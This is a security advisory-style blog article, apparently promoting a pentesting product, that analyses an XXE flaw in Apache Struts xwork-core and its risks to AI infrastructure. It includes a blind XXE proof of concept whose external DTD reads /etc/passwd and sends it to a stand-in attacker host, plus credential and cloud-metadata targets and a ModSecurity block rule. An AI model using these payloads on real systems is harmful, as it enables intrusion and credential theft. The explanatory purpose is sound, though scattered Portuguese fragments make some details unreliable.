In the fast-evolving landscape of Generative AI, security engineers often tunnel-vision on model-specific threats—Prompt Injection, Jailbreaking, or Data Poisoning. However, the release of CVE-2025-68493 on January 11, 2026, serves as a brutal reminder: the legacy infrastructure wrapping your cutting-edge models is often the weakest link.
This article provides a technical autopsy of the critical vulnerability found in the Apache Struts xwork-core component. We will analyze the root cause at the code level, explore its devastating potential on MLOps pipelines, and discuss remediation strategies ranging from immediate patching to AI-driven automated defense.
The Technical Anatomy of CVE-2025-68493
While Apache Struts has a notorious history with Remote Code Execution (RCE) via OGNL injection (re: Equifax), CVE-2025-68493 attacks a different vector: XML parsing logic.
The Vulnerability Scope
- Componente:
xwork-core(The command pattern framework underlying Struts 2). - Vulnerability Type: XML External Entity (XXE) Injection due to [CWE-112] Missing XML Validation.
- Affected Versions: Apache Struts 2.0.0 – 6.1.0.
- CVSS v3.1 Score: 9,8 (Crítico).
Root Cause Analysis
The vulnerability stems from the XWorkConverter and its handling of specific configuration descriptors. When the framework processes an HTTP request with Content-Type: application/xml, the underlying XML parser (often Xerces, wrapped by Struts) is instantiated to deserialize the payload.
In affected versions, the DomHelper class fails to explicitly disable DTD (Document Type Definition) processing and external entity resolution by default.
A secure implementation requires setting specific feature flags on the DocumentBuilderFactory. The absence of these flags in CVE-2025-68493 creates the opening:
Java
// VULNERABLE CODE PATTERN (Conceptual) DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance(); // Missing: dbf.setFeature("<http://apache.org/xml/features/disallow-doctype-decl>", true); // Missing: dbf.setFeature("<http://xml.org/sax/features/external-general-entities>", false); DocumentBuilder db = dbf.newDocumentBuilder(); Document doc = db.parse(inputStream); // Trigger point
Without these guardrails, an attacker can define malicious entities in the DOCTYPE header that the server is forced to resolve.
Why This Matters for AI & MLOps Infrastructure
You might ask: “We run Python/PyTorch for inference. Why does a Java framework vulnerability matter?”
The reality of enterprise AI is hybridity. While the model runs in a containerized Python environment, the Orchestration Layer, API Gatewaye Legacy Data Lakes feeding those models are frequently built on mature Java stacks like Struts or Spring.
CVE-2025-68493 exposes three specific risks to AI Systems:
1. Model Weight & Dataset Exfiltration (LFI)
An XXE attack allows Local File Inclusion. If your Struts application has read access to the file system (which it often does in non-root user containers), an attacker can read configuration files.
- Alvo:
/root/.huggingface/tokenouaws_credentials. - Impacto: Attackers steal the credentials needed to pull your proprietary checkpoints or private datasets from S3 buckets.
2. SSRF against Metadata Services (Cloud Jacking)
This is the most critical vector for cloud-native AI. By forcing the XML parser to make HTTP requests, attackers can hit the Instance Metadata Service (IMDS).
- Payload Target:
http://169.254.169.254/latest/meta-data/iam/security-credentials/ - Impacto: Stealing the IAM role attached to the EC2 instance. In AI clusters, these roles often have broad permissions to provision expensive GPU instances (P4/P5 instances), leading to resource hijacking for crypto-mining or unauthorized training.
3. Denial of Service (Billion Laughs Attack)
AI inference servers are resource-intensive. A recursive entity expansion attack (“Billion Laughs”) sent via CVE-2025-68493 can exhaust the server’s memory, causing the orchestration node to crash and disrupting the availability of the AI service.
Attack Vector Simulation: Proof of Concept
Below is a technical recreation of how an attacker exploits this vulnerability.
Cenário: A legacy Struts action is used to parse user profiles before passing data to a recommendation engine.
Request Header:
HTTP
POST /struts2-showcase/person/create.action HTTP/1.1 Host: vulnerable-ai-gateway.corp Content-Type: application/xml
Malicious Payload (Blind XXE with Out-of-Band Exfiltration):
In many modern setups, the server response is sanitized, meaning you won’t see the file content directly in the HTTP response (Blind XXE). Attackers use parameter entities to send data to a controlled server.
XML
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY % remote SYSTEM "<http://attacker-c2.com/eval.dtd>"> %remote; ]> <person> <name>John Doe</name> <bio>&exfiltrate;</bio> </person>
Content of eval.dtd hosted on Attacker Server:
XML
<!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://attacker-c2.com/?data=%file;'>"> %eval;
Fluxo de execução:
- The Struts parser reads the main XML.
- It fetches the external DTD from
attacker-c2.com. - It parses the external DTD, which instructs it to read
/etc/passwd. - It sends the content of
/etc/passwdback to the attacker’s server as a URL parameter.
Detection and Remediation Strategy
Immediate Mitigation (The “Stop the Bleeding” Phase)
If you cannot deploy the patch immediately, you must apply strict WAF (Web Application Firewall) rules at your ingress controller.
Exemplo de regra ModSecurity:
Apache
SecRule REQUEST_BODY "(?i)<!DOCTYPE" \\ "id:1001,phase:2,t:none,log,deny,status:403,msg:'Potential XML Injection Detected (CVE-2025-68493)'"
Note: This is a blunt instrument. It blocks all DTDs, which may break legitimate SOAP endpoints. Test in staging first.
The Official Fix
Atualize para Apache Struts 6.1.1+. The Apache team has patched xwork-core to ignore external entities by default. Verify the upgrade by checking the struts2-core JAR version in your WEB-INF/lib or Maven dependency tree.
| Dependency | Vulnerable Version | Versão corrigida |
|---|---|---|
struts2-core | < 6.1.1 | 6.1.1+ |
xwork-core | < 6.1.1 | 6.1.1+ |
Scaling Security: The Role of AI in Vulnerability Validation
In complex microservices architectures, simply running a vulnerability scanner (like Nessus or OpenVAS) generates massive noise. Scanners match version numbers but often fail to validate if the specific configuration is exploitable. This creates “Alert Fatigue” for security teams.
This is where the paradigm shifts from Static Scanning para Agentic Penetration Testing.
Automated Exploitation with Penligent
Modern security requires tools that “think” like an attacker. Penligente (penligent.ai) represents the next generation of Automated Penetration Testing Platforms. Unlike traditional scanners that use regex matching, Penligent utilizes LLM-driven agents to understand the context of the application.
How Penligent Handles CVE-2025-68493:
- Contextual Discovery: Penligent identifies the
Content-Type: application/xmlendpoints, even if they are undocumented or hidden behind complex API routes. - Intelligent Payload Construction: Instead of spraying generic payloads, the Penligent agent analyzes the application’s behavior. If it detects a Struts signature, it constructs a specific PoC for CVE-2025-68493.
- Safe Validation: The agent attempts to trigger a benign interaction (e.g., a DNS lookup via XXE) rather than reading sensitive files, proving the exploitability without risking data privacy.
- False Positive Elimination: By validating the execution path, Penligent filters out the noise. If the library is present but the XML parser is configured securely, Penligent marks it as “Safe,” saving your team hours of investigation.
For teams managing hundreds of services, the ability to say “Penligent verified 300 services, and only 2 are actually exploitable” is the difference between a chaotic weekend and a managed patch cycle.
Conclusão
CVE-2025-68493 is not just another line item in a vulnerability report; it is a structural weakness in the foundation of many enterprise AI platforms. The ability to traverse from a legacy Java component to controlling cloud metadata services makes this a Tier-1 threat.
Security engineers must move beyond the “patch and pray” methodology. By understanding the low-level XML parsing mechanics and leveraging AI-powered offensive tooling like Penligent, we can ensure that our infrastructure remains as resilient as the models we build.
Next Step for You:
Audit your SBOM (Software Bill of Materials) today for struts2-core versions below 6.1.1. If found, isolate the container immediately and initiate your incident response protocol.
Referências:
Portuguese 
English 
German 
French 
Spanish 
Japanese 
Korean 
Hindi 
Arabic 
Turkish 
Hebrew